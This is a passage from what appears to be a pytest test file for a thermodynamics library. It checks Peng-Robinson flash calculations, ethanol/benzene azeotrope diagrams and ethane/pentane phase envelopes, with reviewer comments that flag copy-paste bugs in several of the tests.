    assert pkg.phase == 'g'
    H1 = pkg.Hm
    pkg.flash(T=450, P=1e8, zs=m.zs)
    assert pkg.phase == 'l'
    H2 = pkg.Hm
    assert_allclose(H1 - H2, 13815.6666172, rtol=1e-3)

    # low P fluid to saturation pressure (both gas)
    pkg.flash(T=450, P=400, zs=m.zs)
    assert pkg.phase == 'g'
    H1 = pkg.Hm
    pkg.flash(T=450, VF=1, zs=m.zs)
    assert pkg.phase == 'g'
    H2 = pkg.Hm
    assert_allclose(H1 - H2, 2003.84468984, rtol=1e-3)

    # low pressure gas to liquid saturated
    pkg.flash(T=350, P=400, zs=m.zs)
    assert pkg.phase == 'g'
    H1 = pkg.Hm
    pkg.flash(T=350, VF=0, zs=m.zs)
    assert pkg.phase == 'l'
    H2 = pkg.Hm
    assert_allclose(H1 - H2, 23682.3468207, rtol=1e-3)

    # High pressure liquid to partial evaporation
    pkg.flash(T=350, P=3e6, zs=m.zs)
    assert pkg.phase == 'l'
    H1 = pkg.Hm
    pkg.flash(T=350, VF=.25, zs=m.zs)
    assert pkg.phase == 'l/g'
    H2 = pkg.Hm
    assert_allclose(H1 - H2, -2328.21259061, rtol=1e-3)

    # High pressure temperature change
    pkg.flash(T=300, P=3e6, zs=m.zs)
    assert pkg.phase == 'l'
    H1 = pkg.Hm
    pkg.flash(T=400, P=1e7, zs=m.zs)
    assert pkg.phase == 'l'
    H2 = pkg.Hm
    assert_allclose(H1 - H2, -18470.2994798, rtol=1e-3)

    # High pressure temperature change and phase change
    pkg.flash(T=300, P=3e6, zs=m.zs)
    assert pkg.phase == 'l'
    H1 = pkg.Hm
    pkg.flash(T=400, P=1e5, zs=m.zs)
    assert pkg.phase == 'g'
    H2 = pkg.Hm
    assert_allclose(H1 - H2, -39430.7145672, rtol=1e-3)
@pytest.mark.deprecated
def test_PRMIX_pkg_S():
    """Molar entropy differences between pairs of flashed states for an
    ethane/heptane mixture with the PR EOS package.

    Mirrors :func:`test_PRMIX_pkg_H` but checks ``Sm`` differences.  (This
    version removes the bare no-op ``S1 - S2`` expression statements and
    the unused ``H1``/``H2`` assignments present in the original.)
    """
    zs = [0.4, 0.6]
    m = Mixture(['Ethane', 'Heptane'], zs=zs, T=300, P=1E6)
    kij = .0
    kijs = [[0, kij], [kij, 0]]
    Tcs = [305.322, 540.13]
    Pcs = [4872200.0, 2736000.0]
    omegas = [0.099, 0.349]
    pkg = GceosBase(eos_mix=PRMIX, VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs,
                    Tcs=Tcs, Pcs=Pcs, omegas=omegas,
                    kijs=kijs, eos_kwargs=None,
                    HeatCapacityGases=m.HeatCapacityGases)
    pkg.FLASH_VF_TOL = 1e-12

    # Case gas-gas pressure difference
    pkg.flash(T=450, P=400, zs=m.zs)
    S1 = pkg.Sm
    assert pkg.phase == 'g'
    pkg.flash(T=450, P=1e6, zs=m.zs)
    S2 = pkg.Sm
    assert pkg.phase == 'g'
    assert_allclose(S1 - S2, 67.59095157604824, rtol=1e-3)

    # Case gas to VF = 0.5 at same T
    pkg.flash(T=350, P=400, zs=m.zs)
    assert pkg.phase == 'g'
    S1 = pkg.Sm
    pkg.flash(T=350, VF=.5, zs=m.zs)
    assert pkg.phase == 'l/g'
    S2 = pkg.Sm
    assert_allclose(S1 - S2, 96.84959621651315, rtol=1e-3)

    # Higher pressure, less matching (gas constant diff probably; gas-liquid difference! No partial phase.)
    pkg.flash(T=450, P=400, zs=m.zs)
    assert pkg.phase == 'g'
    S1 = pkg.Sm
    pkg.flash(T=450, P=1e8, zs=m.zs)
    assert pkg.phase == 'l'
    S2 = pkg.Sm
    assert_allclose(S1 - S2, 128.67194096593366, rtol=1e-3)

    # low P fluid to saturation pressure (both gas)
    pkg.flash(T=450, P=400, zs=m.zs)
    assert pkg.phase == 'g'
    S1 = pkg.Sm
    pkg.flash(T=450, VF=1, zs=m.zs)
    assert pkg.phase == 'g'
    S2 = pkg.Sm
    assert_allclose(S1 - S2, 69.64345358808025, rtol=1e-3)

    # low pressure gas to liquid saturated
    pkg.flash(T=350, P=400, zs=m.zs)
    assert pkg.phase == 'g'
    S1 = pkg.Sm
    pkg.flash(T=350, VF=0, zs=m.zs)
    assert pkg.phase == 'l'
    S2 = pkg.Sm
    assert_allclose(S1 - S2, 124.44419797042649, rtol=1e-3)

    # High pressure liquid to partial evaporation
    pkg.flash(T=350, P=3e6, zs=m.zs)
    assert pkg.phase == 'l'
    S1 = pkg.Sm
    pkg.flash(T=350, VF=.25, zs=m.zs)
    assert pkg.phase == 'l/g'
    S2 = pkg.Sm
    assert_allclose(S1 - S2, -7.913399921816193, rtol=1e-3)

    # High pressure temperature change
    pkg.flash(T=300, P=3e6, zs=m.zs)
    assert pkg.phase == 'l'
    S1 = pkg.Sm
    pkg.flash(T=400, P=1e7, zs=m.zs)
    assert pkg.phase == 'l'
    S2 = pkg.Sm
    assert_allclose(S1 - S2, -50.38050604000216, atol=1)

    # High pressure temperature change and phase change
    pkg.flash(T=300, P=3e6, zs=m.zs)
    assert pkg.phase == 'l'
    S1 = pkg.Sm
    pkg.flash(T=400, P=1e5, zs=m.zs)
    assert pkg.phase == 'g'
    S2 = pkg.Sm
    assert_allclose(S1 - S2, -124.39457107124854, atol=1)
@pytest.mark.deprecated
def test_PRMIX_pkg_extras():
    """Spot-check derived EOS properties (departure enthalpy/entropy and
    heat capacities) for one gas-phase and one liquid-phase state of the
    ethane/heptane binary.
    """
    # TODO add more properties as they are added
    zs = [0.4, 0.6]
    m = Mixture(['Ethane', 'Heptane'], zs=zs, T=300, P=1E6)
    kij = .0
    kijs = [[0,kij],[kij,0]]
    Tcs = [305.322, 540.13]
    Pcs = [4872200.0, 2736000.0]
    omegas = [0.099, 0.349]
    pkg = GceosBase(eos_mix=PRMIX, VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs,
                    Tcs=Tcs, Pcs=Pcs, omegas=omegas,
                    kijs=kijs, eos_kwargs=None,
                    HeatCapacityGases=m.HeatCapacityGases)

    # Gas-phase state
    pkg.flash(T=400, P=1e5, zs=m.zs)
    assert 'g' == pkg.phase
    assert_allclose(pkg.eos_g.H_dep_g, -179.77096245871508, rtol=1e-5)
    assert_allclose(pkg.eos_g.S_dep_g, -0.2971318950892263, rtol=1e-5)
    assert_allclose(pkg.Hgm_dep, -179.77096245871508, rtol=5e-5)
    assert_allclose(pkg.Sgm_dep, -0.2971318950892263, rtol=5e-5)
    assert_allclose(pkg.Cpgm, 153.32126587681677, rtol=1e-3)
    assert_allclose(pkg.Cvgm, 144.3920626710827, rtol=1e-3) # :)
    assert_allclose(pkg.Cpgm_dep, 0.7139646058820279, rtol=1e-5)
    assert_allclose(pkg.Cvgm_dep, 0.09922120014794993, rtol=1e-5) #? maybe issue

    # Liquid-phase state
    pkg.flash(T=300, P=1e7, zs=m.zs)
    assert 'l' == pkg.phase
    assert_allclose(pkg.eos_l.H_dep_l, -25490.54123032457, rtol=5e-5)
    assert_allclose(pkg.eos_l.S_dep_l, -48.47646403887194, rtol=5e-5)
    assert_allclose(pkg.Hlm_dep, -25490.54123, rtol=1e-4)
    assert_allclose(pkg.Slm_dep, -48.47646403887194, rtol=1e-4)
    assert_allclose(pkg.Cplm, 160.5756363050434, rtol=1e-3)
    assert_allclose(pkg.Cvlm, 133.7943922248561, rtol=1e-3) # :)
    assert_allclose(pkg.Cplm_dep, 39.8813153015303, rtol=5e-5)
    assert_allclose(pkg.Cvlm_dep, 21.414531021342995, rtol=5e-5) #? maybe issue
@pytest.mark.deprecated
def test_azeotrope_Txy_PR():
    """T-x-y diagram for ethanol/benzene at 1 atm using the PR package.

    This system forms a minimum-boiling azeotrope; the bubble and dew
    temperature curves computed over 30 composition points are compared
    against reference values.
    """
    IDs = ['ethanol', 'benzene']
    pkg = PropertyPackageConstants(IDs, name=PR_PKG)
    # Symmetric ethanol/benzene binary interaction parameter.
    pkg.pkg.kijs = [[0.0, .0728], [0.0728, 0]]
    # Test the pressure in the test
    _, _, Tbubbles, Tdews = pkg.pkg.plot_Txy(P=101325., pts=30, values=True)
    # Reference bubble/dew temperatures, K, one per composition grid point.
    Tbubbles_expect = [353.1524424999673, 351.21711105215405, 349.63220641849136, 348.3290291072549, 347.2552443556649, 346.37022614955663, 345.6419123814478, 345.0446351984003, 344.55759626315887, 344.16377920005266, 343.84916614883053, 343.60217197943285, 343.41323969870245, 343.2745605540422, 343.1798963139651, 343.12449170081203, 343.1050736632354, 343.1199423771055, 343.169167658216, 343.2549149821879, 343.38193882073034, 343.5582990521058, 343.7963805186986, 344.1143278723936, 344.53804741377195, 345.1039685436253, 345.8627772097754, 346.88426937346605, 348.26317130456636, 350.12491594342015]
    Tdews_expect = [353.1524424945457, 352.3912913474467, 351.6262944570331, 350.8588218276585, 350.0906535909099, 349.32409993796796, 348.56216098024134, 347.8087416697709, 347.0689431804551, 346.349459873305, 345.6591224986107, 345.00963438553083, 344.4165436003679, 343.90042076441017, 343.4879384830795, 343.21166686886806, 343.10538604291753, 343.1904450269102, 343.4583142995908, 343.8715382698287, 344.38531268086734, 344.96341038590646, 345.5807576414249, 346.22080282099756, 346.8726671468842, 347.52913516661, 348.18536889289476, 348.83809921197854, 349.4851121234294, 350.1249159362295]
    assert_allclose(Tbubbles, Tbubbles_expect, rtol=5e-5)
    assert_allclose(Tdews, Tdews_expect, rtol=5e-5)
@pytest.mark.deprecated
def test_azeotrope_Txy_PR_multiP():
    """T-x-y sweep for ethanol/benzene over five pressures from 100 Pa to
    1 MPa (logspace), 15 composition points each, compared against stored
    reference bubble/dew temperature curves.
    """
    IDs = ['ethanol', 'benzene']
    pkg = PropertyPackageConstants(IDs, name=PR_PKG)
    pkg.pkg.kijs = [[0.0, .0728], [0.0728, 0]]
    #Test some more pressures for good measure (do not go too far near the boundaries)
    # Reference data: one sublist of 15 temperatures (K) per pressure.
    Tdews_vary_P_expect = [[220.15284322119734, 219.96736090890047, 222.4531025319982, 225.87591713961928, 228.38731541934482, 230.38394741856035, 232.04763019651986, 233.47741573028978, 234.73343380218137, 235.85502051831918, 236.8693632699694, 237.79606282049812, 238.6497311937851, 239.441561771029, 240.18032475929877], [250.29484272442642, 249.8077093695365, 249.42498602603337, 249.28679137901344, 251.96383913156598, 254.37995372490553, 256.413822517376, 258.1732216294687, 259.72617151880036, 261.1180840150342, 262.38075082537034, 263.53729905772974, 264.6050861496727, 265.5974792849115, 266.5249972102388], [291.6640151659878, 290.7705630707953, 289.9138195863271, 289.1364722089608, 288.52440010361823, 288.2911650820978, 289.2699169291151, 291.1074635611929, 292.88383384665804, 294.5345675748379, 296.06323507541447, 297.48280466114016, 298.8066120886574, 300.0464992568524, 301.2125736864664], [352.7187334210476, 351.14318764286776, 349.5582311684951, 347.9830060760723, 346.4505096140636, 345.01844631869784, 343.78971773705734, 342.946979856768, 342.761997697104, 343.3571699367641, 344.44973552643745, 345.7436125329223, 347.09887074851576, 348.456160479165, 349.78950974944104], [452.0244773102955, 448.93347954186527, 445.80843092367013, 442.6587093618919, 439.501298156353, 436.36519982883647, 433.2983005305142, 430.3773519002321, 427.7197877701338, 425.488417876116, 423.8636548918616, 422.9595322281223, 422.7424527930051, 423.0631573964071, 423.755679832123]]
    Tbubbles_vary_P_expect = [[220.15284322260558, 219.9593754659149, 219.97616818101181, 220.06166994291502, 220.11857644484724, 220.07120074079083, 219.85507103807385, 219.41277280716295, 218.69492646979015, 217.668864547681, 216.34458685271593, 214.85030366123252, 213.69173078234607, 215.05360231675624, 240.18032476043962], [250.29484272636603, 249.6034873812954, 249.3302912913737, 249.28015720321142, 249.32976951168072, 249.39258345431227, 249.40319499276376, 249.31112373153306, 249.08166823900348, 248.70647278451116, 248.234802114006, 247.86101246500266, 248.19942715491368, 251.37880207972458, 266.5249972119777], [291.6640151695664, 289.98349864091705, 289.03830617940577, 288.5439451223825, 288.32964841249037, 288.2845537334007, 288.33357406890497, 288.4270830783461, 288.5394805139744, 288.6772197151695, 288.90297364622535, 289.39555977182874, 290.6007278361622, 293.62911489553994, 301.2125736895028], [352.71873342667294, 349.111737745725, 346.7112146623439, 345.1062784039534, 344.0464541688307, 343.37007653346484, 342.96929893428904, 342.772655513814, 342.7375808864912, 342.85043503480443, 343.1348957652109, 343.67328993658566, 344.6514600873893, 346.44748552216527, 349.78950975665305], [452.0244773382353, 444.9894726934088, 439.5814848561124, 435.3968758569498, 432.1385100677904, 429.5895584761499, 427.5915768205421, 426.02882099085946, 424.8179436451578, 423.90205997868895, 423.2487129719721, 422.85201924536585, 422.7401871273592, 422.99064457143066, 423.7556798321766]]
    Tdews_vary_P = []
    Tbubbles_vary_P = []
    # pkg.pkg.plot_Txy(P=100, pts=100) # values=True
    for P in logspace(2, 6, 5):
        _, _, Tbubbles, Tdews = pkg.pkg.plot_Txy(P=P, pts=15, values=True)
        Tbubbles_vary_P.append(Tbubbles)
        Tdews_vary_P.append(Tdews)
    assert_allclose(Tbubbles_vary_P, Tbubbles_vary_P_expect, rtol=1e-5)
    assert_allclose(Tdews_vary_P, Tdews_vary_P_expect, rtol=1e-5)
@pytest.mark.deprecated
def test_azeotrope_Pxy_PR_multiT():
    """P-x-y sweep for ethanol/benzene, intended to cover a range of
    temperatures.

    NOTE(review): the loop below iterates over `Ts` but never uses the loop
    variable -- `plot_Pxy` is called with the hard-coded `T=507.5` on every
    pass, which is why every row of both expected arrays is identical.  The
    call was almost certainly meant to be `plot_Pxy(T=T, ...)`; fixing it
    requires regenerating the expected data, so it is only flagged here.
    """
    IDs = ['ethanol', 'benzene']
    pkg = PropertyPackageConstants(IDs, name=PR_PKG)
    pkg.pkg.kijs = [[0.0, .0728], [0.0728, 0]]
    Ts = [220, 250, 300, 350, 400, 450, 475, 450, 500, 505, 507.5]
    # Reference data: one sublist of 20 pressures (Pa) per temperature in Ts.
    # All rows are identical (see NOTE in the docstring).
    Ps_bubble_multi_T_expect = [[2413788.5246687443, 2641798.365260112, 2861327.402278104, 3072725.7261532187, 3276386.430826817, 3472735.47268973, 3662217.055850461, 3845273.4025023617, 4022317.494062474, 4193697.0600327696, 4359647.812662887, 4520233.860544795, 4675273.823398787, 4824253.350470867, 4966230.2319129715, 5099749.351949349, 5222801.450719186, 5332871.261916157, 5427095.16804713, 5502455.831709672], [2413788.5246687443, 2641798.365260112, 2861327.402278104, 3072725.7261532187, 3276386.430826817, 3472735.47268973, 3662217.055850461, 3845273.4025023617, 4022317.494062474, 4193697.0600327696, 4359647.812662887, 4520233.860544795, 4675273.823398787, 4824253.350470867, 4966230.2319129715, 5099749.351949349, 5222801.450719186, 5332871.261916157, 5427095.16804713, 5502455.831709672], [2413788.5246687443, 2641798.365260112, 2861327.402278104, 3072725.7261532187, 3276386.430826817, 3472735.47268973, 3662217.055850461, 3845273.4025023617, 4022317.494062474, 4193697.0600327696, 4359647.812662887, 4520233.860544795, 4675273.823398787, 4824253.350470867, 4966230.2319129715, 5099749.351949349, 5222801.450719186, 5332871.261916157, 5427095.16804713, 5502455.831709672], [2413788.5246687443, 2641798.365260112, 2861327.402278104, 3072725.7261532187, 3276386.430826817, 3472735.47268973, 3662217.055850461, 3845273.4025023617, 4022317.494062474, 4193697.0600327696, 4359647.812662887, 4520233.860544795, 4675273.823398787, 4824253.350470867, 4966230.2319129715, 5099749.351949349, 5222801.450719186, 5332871.261916157, 5427095.16804713, 5502455.831709672], [2413788.5246687443, 2641798.365260112, 2861327.402278104, 3072725.7261532187, 3276386.430826817, 3472735.47268973, 3662217.055850461, 3845273.4025023617, 4022317.494062474, 4193697.0600327696, 4359647.812662887, 4520233.860544795, 4675273.823398787, 4824253.350470867, 4966230.2319129715, 5099749.351949349, 5222801.450719186, 5332871.261916157, 5427095.16804713, 5502455.831709672], [2413788.5246687443, 2641798.365260112, 
    2861327.402278104, 3072725.7261532187, 3276386.430826817, 3472735.47268973, 3662217.055850461, 3845273.4025023617, 4022317.494062474, 4193697.0600327696, 4359647.812662887, 4520233.860544795, 4675273.823398787, 4824253.350470867, 4966230.2319129715, 5099749.351949349, 5222801.450719186, 5332871.261916157, 5427095.16804713, 5502455.831709672], [2413788.5246687443, 2641798.365260112, 2861327.402278104, 3072725.7261532187, 3276386.430826817, 3472735.47268973, 3662217.055850461, 3845273.4025023617, 4022317.494062474, 4193697.0600327696, 4359647.812662887, 4520233.860544795, 4675273.823398787, 4824253.350470867, 4966230.2319129715, 5099749.351949349, 5222801.450719186, 5332871.261916157, 5427095.16804713, 5502455.831709672], [2413788.5246687443, 2641798.365260112, 2861327.402278104, 3072725.7261532187, 3276386.430826817, 3472735.47268973, 3662217.055850461, 3845273.4025023617, 4022317.494062474, 4193697.0600327696, 4359647.812662887, 4520233.860544795, 4675273.823398787, 4824253.350470867, 4966230.2319129715, 5099749.351949349, 5222801.450719186, 5332871.261916157, 5427095.16804713, 5502455.831709672], [2413788.5246687443, 2641798.365260112, 2861327.402278104, 3072725.7261532187, 3276386.430826817, 3472735.47268973, 3662217.055850461, 3845273.4025023617, 4022317.494062474, 4193697.0600327696, 4359647.812662887, 4520233.860544795, 4675273.823398787, 4824253.350470867, 4966230.2319129715, 5099749.351949349, 5222801.450719186, 5332871.261916157, 5427095.16804713, 5502455.831709672], [2413788.5246687443, 2641798.365260112, 2861327.402278104, 3072725.7261532187, 3276386.430826817, 3472735.47268973, 3662217.055850461, 3845273.4025023617, 4022317.494062474, 4193697.0600327696, 4359647.812662887, 4520233.860544795, 4675273.823398787, 4824253.350470867, 4966230.2319129715, 5099749.351949349, 5222801.450719186, 5332871.261916157, 5427095.16804713, 5502455.831709672], [2413788.5246687443, 2641798.365260112, 2861327.402278104, 3072725.7261532187, 3276386.430826817, 
    3472735.47268973, 3662217.055850461, 3845273.4025023617, 4022317.494062474, 4193697.0600327696, 4359647.812662887, 4520233.860544795, 4675273.823398787, 4824253.350470867, 4966230.2319129715, 5099749.351949349, 5222801.450719186, 5332871.261916157, 5427095.16804713, 5502455.831709672]]
    Ps_dew_multi_T_expect = [[2413788.5246687448, 2528934.820505938, 2653201.630551055, 2787361.571970873, 2932152.5813825456, 3088204.613722783, 3255927.030569813, 3435346.2652946324, 3625890.6578108566, 3826139.6891573607, 4033592.988357248, 4244562.319550634, 4454311.19552944, 4657505.6804501135, 4848882.834798467, 5023886.247109449, 5179004.275036525, 5311703.561411566, 5420071.437922198, 5502455.831709671], [2413788.5246687448, 2528934.820505938, 2653201.630551055, 2787361.571970873, 2932152.5813825456, 3088204.613722783, 3255927.030569813, 3435346.2652946324, 3625890.6578108566, 3826139.6891573607, 4033592.988357248, 4244562.319550634, 4454311.19552944, 4657505.6804501135, 4848882.834798467, 5023886.247109449, 5179004.275036525, 5311703.561411566, 5420071.437922198, 5502455.831709671], [2413788.5246687448, 2528934.820505938, 2653201.630551055, 2787361.571970873, 2932152.5813825456, 3088204.613722783, 3255927.030569813, 3435346.2652946324, 3625890.6578108566, 3826139.6891573607, 4033592.988357248, 4244562.319550634, 4454311.19552944, 4657505.6804501135, 4848882.834798467, 5023886.247109449, 5179004.275036525, 5311703.561411566, 5420071.437922198, 5502455.831709671], [2413788.5246687448, 2528934.820505938, 2653201.630551055, 2787361.571970873, 2932152.5813825456, 3088204.613722783, 3255927.030569813, 3435346.2652946324, 3625890.6578108566, 3826139.6891573607, 4033592.988357248, 4244562.319550634, 4454311.19552944, 4657505.6804501135, 4848882.834798467, 5023886.247109449, 5179004.275036525, 5311703.561411566, 5420071.437922198, 5502455.831709671], [2413788.5246687448, 2528934.820505938, 2653201.630551055, 2787361.571970873, 2932152.5813825456, 3088204.613722783, 3255927.030569813, 3435346.2652946324, 3625890.6578108566, 3826139.6891573607, 4033592.988357248, 4244562.319550634, 4454311.19552944, 4657505.6804501135, 4848882.834798467, 5023886.247109449, 5179004.275036525, 5311703.561411566, 5420071.437922198, 5502455.831709671], [2413788.5246687448, 2528934.820505938, 
    2653201.630551055, 2787361.571970873, 2932152.5813825456, 3088204.613722783, 3255927.030569813, 3435346.2652946324, 3625890.6578108566, 3826139.6891573607, 4033592.988357248, 4244562.319550634, 4454311.19552944, 4657505.6804501135, 4848882.834798467, 5023886.247109449, 5179004.275036525, 5311703.561411566, 5420071.437922198, 5502455.831709671], [2413788.5246687448, 2528934.820505938, 2653201.630551055, 2787361.571970873, 2932152.5813825456, 3088204.613722783, 3255927.030569813, 3435346.2652946324, 3625890.6578108566, 3826139.6891573607, 4033592.988357248, 4244562.319550634, 4454311.19552944, 4657505.6804501135, 4848882.834798467, 5023886.247109449, 5179004.275036525, 5311703.561411566, 5420071.437922198, 5502455.831709671], [2413788.5246687448, 2528934.820505938, 2653201.630551055, 2787361.571970873, 2932152.5813825456, 3088204.613722783, 3255927.030569813, 3435346.2652946324, 3625890.6578108566, 3826139.6891573607, 4033592.988357248, 4244562.319550634, 4454311.19552944, 4657505.6804501135, 4848882.834798467, 5023886.247109449, 5179004.275036525, 5311703.561411566, 5420071.437922198, 5502455.831709671], [2413788.5246687448, 2528934.820505938, 2653201.630551055, 2787361.571970873, 2932152.5813825456, 3088204.613722783, 3255927.030569813, 3435346.2652946324, 3625890.6578108566, 3826139.6891573607, 4033592.988357248, 4244562.319550634, 4454311.19552944, 4657505.6804501135, 4848882.834798467, 5023886.247109449, 5179004.275036525, 5311703.561411566, 5420071.437922198, 5502455.831709671], [2413788.5246687448, 2528934.820505938, 2653201.630551055, 2787361.571970873, 2932152.5813825456, 3088204.613722783, 3255927.030569813, 3435346.2652946324, 3625890.6578108566, 3826139.6891573607, 4033592.988357248, 4244562.319550634, 4454311.19552944, 4657505.6804501135, 4848882.834798467, 5023886.247109449, 5179004.275036525, 5311703.561411566, 5420071.437922198, 5502455.831709671], [2413788.5246687448, 2528934.820505938, 2653201.630551055, 2787361.571970873, 2932152.5813825456, 
    3088204.613722783, 3255927.030569813, 3435346.2652946324, 3625890.6578108566, 3826139.6891573607, 4033592.988357248, 4244562.319550634, 4454311.19552944, 4657505.6804501135, 4848882.834798467, 5023886.247109449, 5179004.275036525, 5311703.561411566, 5420071.437922198, 5502455.831709671]]
    Ps_bubble_multi_T, Ps_dew_multi_T = [], []
    for T in Ts:
        # NOTE(review): `T` (loop variable) is unused; T=507.5 is hard-coded.
        _, _, Ps_bubble, Ps_dew = pkg.pkg.plot_Pxy(T=507.5, pts=20, ignore_errors=True, values=True)
        Ps_bubble_multi_T.append(Ps_bubble)
        Ps_dew_multi_T.append(Ps_dew)
    assert_allclose(Ps_bubble_multi_T_expect, Ps_bubble_multi_T, rtol=1e-6)
    assert_allclose(Ps_dew_multi_T_expect, Ps_dew_multi_T, rtol=1e-6)
@pytest.mark.deprecated
def test_phase_envelope_ethane_pentane():
    """Trace the dew- and bubble-point T(P) envelopes of an ethane/n-pentane
    mixture and compare the points landing on the `spec_points` pressure
    grid against stored reference temperatures.

    NOTE(review): the second checking loop below zips `(P_points, Ts_known)`
    -- the *dew* envelope results -- rather than `(P_points2, Ts_known2)`
    from the bubble envelope, and `Ts_bubble_expect` is byte-for-byte the
    same array as `Ts_dew_expect`.  This looks like a copy-paste error: the
    bubble branch re-verifies the dew data and the bubble envelope is never
    actually checked.  Fixing it requires regenerating the expected data, so
    it is only flagged here.
    """
    IDs = ['ethane', 'n-pentane']
    pkg = PropertyPackageConstants(IDs, PR_PKG, kijs=[[0, 7.609447e-003], [7.609447e-003, 0]])
    zs = [0.7058334393128614, 0.2941665606871387] # 50/50 mass basis
    # Envelope-tracing controls (step damping/expansion and termination).
    max_step_damping = 100
    P_high = 8e6
    factor = 1.2
    min_step_termination = 1000
    min_factor_termination = 1.001
    pkg.pkg.FLASH_VF_TOL = 1e-8
    max_P_step = 1e5
    P_low = 1e5
    # Pressures at which envelope points are explicitly requested.
    spec_points = linspace(1e5, 6.8e6, 68)
    P_points, Ts_known, xs_known = pkg.pkg.dew_T_envelope(zs, P_low=P_low, P_high=P_high, xtol=1E-10,
                                                      factor=factor, min_step_termination=min_step_termination,
                                                      min_factor_termination=min_factor_termination,
                                                      max_step_damping=max_step_damping,
                                                      max_P_step=max_P_step,
                                                      spec_points=spec_points)
    P_points2, Ts_known2, ys_known = pkg.pkg.bubble_T_envelope(zs, P_low=P_low, P_high=P_high, xtol=1E-10,
                                                      factor=factor, min_step_termination=min_step_termination,
                                                      max_step_damping=max_step_damping,
                                                      min_factor_termination=min_factor_termination,
                                                      max_P_step=max_P_step, spec_points=spec_points)
    # Keep only the points that fell exactly on the spec_points grid.
    Ps_dew_check = []
    Ts_dew_check = []
    Ts_dew_expect = [277.1449361694948, 293.9890986702753, 304.8763147090649, 313.1006603531763, 319.7750626828419, 325.42150966613895, 330.32990856864086, 334.6791912532372, 338.58812791519466, 342.13987634031974, 345.3950895854326, 348.39946023112896, 351.1883247302556, 353.7896091573966, 356.22578835719867, 358.51523195418594, 360.673155009561, 362.71230559820697, 364.64347249145516, 366.47586686424677, 368.21741391309746, 369.8749788315006, 371.4545441481416, 372.96135047685806, 374.40000935978657, 375.774594553273, 377.0887164639959, 378.3455832681606, 379.54805139424366, 380.698667422777, 381.7997029894565, 382.8531839253168, 383.8609145986068, 384.824498212078, 385.74535365141924, 386.6247293397855, 387.4637144549204, 388.2632477701861, 389.02412430395054, 389.7469998909282, 390.4323937166012, 391.08068879770735, 391.69213029960156, 392.2668215113749, 392.8047171889375, 393.30561384008115, 393.76913637985547, 394.19472032380185, 394.58158839582626, 394.9287200011976, 395.2348113354687, 395.4982230372662, 395.71691081859336, 395.8883324260842, 396.0093207511565, 396.0759073750358, 396.0830711573792, 396.024369487178, 395.8913790901176, 395.67280294095485, 395.3529926936849, 394.9092730479461, 394.3067055020046, 393.48636807223045, 392.33342385249546, 390.55261457054587]
    for P_dew, T_dew in zip(P_points, Ts_known):
        if abs(P_dew % 1e5) < 1e-5:
            Ps_dew_check.append(P_dew)
            Ts_dew_check.append(T_dew)
    Ps_bubble_check = []
    Ts_bubble_check = []
    Ts_bubble_expect = [277.1449361694948, 293.9890986702753, 304.8763147090649, 313.1006603531763, 319.7750626828419, 325.42150966613895, 330.32990856864086, 334.6791912532372, 338.58812791519466, 342.13987634031974, 345.3950895854326, 348.39946023112896, 351.1883247302556, 353.7896091573966, 356.22578835719867, 358.51523195418594, 360.673155009561, 362.71230559820697, 364.64347249145516, 366.47586686424677, 368.21741391309746, 369.8749788315006, 371.4545441481416, 372.96135047685806, 374.40000935978657, 375.774594553273, 377.0887164639959, 378.3455832681606, 379.54805139424366, 380.698667422777, 381.7997029894565, 382.8531839253168, 383.8609145986068, 384.824498212078, 385.74535365141924, 386.6247293397855, 387.4637144549204, 388.2632477701861, 389.02412430395054, 389.7469998909282, 390.4323937166012, 391.08068879770735, 391.69213029960156, 392.2668215113749, 392.8047171889375, 393.30561384008115, 393.76913637985547, 394.19472032380185, 394.58158839582626, 394.9287200011976, 395.2348113354687, 395.4982230372662, 395.71691081859336, 395.8883324260842, 396.0093207511565, 396.0759073750358, 396.0830711573792, 396.024369487178, 395.8913790901176, 395.67280294095485, 395.3529926936849, 394.9092730479461, 394.3067055020046, 393.48636807223045, 392.33342385249546, 390.55261457054587]
    # NOTE(review): should almost certainly be zip(P_points2, Ts_known2).
    for P_bubble, T_bubble in zip(P_points, Ts_known):
        if abs(P_bubble % 1e5) < 1e-5:
            Ps_bubble_check.append(P_bubble)
            Ts_bubble_check.append(T_bubble)
    # The traced envelopes terminate before the last two spec pressures.
    assert_allclose(Ps_bubble_check, spec_points[:-2])
    assert_allclose(Ps_dew_check, spec_points[:-2])
    assert_allclose(Ts_dew_check, Ts_dew_expect, rtol=1e-5)
    assert_allclose(Ts_bubble_check, Ts_bubble_expect, rtol=1e-5)
@pytest.mark.deprecated
def test_ethane_pentane_TP_Tdew_Tbubble_TP():
    """Consistency sweep: for pressures spanning the two-phase region, every
    T-P flash strictly between the bubble (VF=0) and dew (VF=1) temperatures
    must converge to a two-phase ('l/g') solution, both with and without the
    Wilson-K initial guess.
    """
    # Takes 9 seconds!
    IDs = ['ethane', 'n-pentane']
    pkg = PropertyPackageConstants(IDs, PR_PKG, kijs=[[0, 7.609447e-003], [7.609447e-003, 0]])
    zs = [0.7058334393128614, 0.2941665606871387] # 50/50 mass basis
    pkg = pkg.pkg
    VFs = []
    all_Ts = []
    all_Ps = []
    P_high = 6.1e6 # goal: 6e6 It worked!
    P_low = 1e3
    Ps = logspace(log10(P_low), log10(P_high), 50)
    T_lows = []
    T_highs = []
    for P in Ps:
        # Bubble temperature gives the lower edge of the two-phase band.
        pkg.flash(P=P, VF=0, zs=zs)
        T_low = pkg.T # 129 K
        T_lows.append(T_low)
        # Dew temperature gives the upper edge.
        pkg.flash(P=P, VF=1, zs=zs)
        T_high = pkg.T # 203 K
        T_highs.append(T_high)
        for Wilson_first in (False, True):
            VFs_working = []
            # Stay strictly inside the envelope to avoid the boundaries.
            Ts = linspace(T_low+1e-4, T_high-1e-4, 50)
            for T in Ts:
                ans = pkg.flash_TP_zs(P=P, T=T, zs=zs, Wilson_first=Wilson_first)
                VFs_working.append(ans[-1])
                if ans[0] != 'l/g':
                    raise ValueError("Converged to single phase solution at T=%g K, P=%g Pa" %(T, P))
            VFs.append(VFs_working)
            all_Ts.append(Ts)
            # NOTE(review): this appends the entire `Ps` array on every pass
            # rather than the current `P`; harmless since `all_Ps` is never
            # asserted on, but it looks like `all_Ps.append(P)` was intended.
            all_Ps.append(Ps)
@pytest.mark.deprecated
@pytest.mark.slow_envelope
def test_phase_envelope_44_components():
    """Trace dew- and bubble-point T(P) envelopes for a 44-component
    petroleum-like mixture and compare points on the `spec_points` grid
    against stored reference temperatures.

    NOTE(review): as in test_phase_envelope_ethane_pentane, the bubble
    checking loop zips `(P_points, Ts_known)` -- the *dew* results -- instead
